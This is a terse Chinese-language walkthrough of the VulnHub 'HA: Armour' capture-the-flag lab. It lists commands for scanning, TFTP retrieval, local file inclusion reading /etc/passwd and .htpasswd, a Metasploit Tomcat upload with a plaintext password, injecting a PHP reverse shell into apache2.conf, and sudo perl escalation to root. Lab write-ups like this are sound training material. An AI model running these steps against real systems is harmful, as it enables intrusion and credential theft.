环境
虚拟机平台:VMware Workstation Pro
攻击机:Kali(IP:192.168.253.136)
靶机:Armour(IP:192.168.253.150)
下载:https://www.vulnhub.com/entry/ha-armour,370/
Let’s go
nmap -A -p- 192.168.253.150
发现源码中存在一些信息
网页查看 notes.txt 文件不存在,怀疑可能跟69端口有关
nmap -p69 192.168.253.150 -sU
tftp 192.168.253.150
get notes.txt
dirscan -u http://192.168.253.150/ -E
curl http://192.168.253.150/file.php?file=/etc/passwd
curl http://192.168.253.150/file.php?file=/etc/apache2/.htpasswd
ssh 192.168.253.150 -p 65534
三个提示组合可以作为密码,使用得到的信息可以登录 tomcat
msfconsole
use exploit/multi/http/tomcat_mgr_upload
set rhosts 192.168.253.150
set rport 8080
set httpusername armour
set httppassword TheOlympicsmaybeevenaStarBucks
set target 2
run
portfwd add -l 8081 -r 127.0.0.1 -p 8081
ls /etc/apache2/apache2.conf
download /etc/apache2/apache2.conf
cd /etc/apache2/
upload apache2.conf
这里需要重启一下
cat ./Assorted/php-reverse-shell.php >> apache2.conf
upload apache2.conf
curl http://192.168.253.150/file.php?file=/etc/apache2/apache2.conf
sudo -l
sudo perl -e 'exec "/bin/sh";'
cd /root
cat final.txt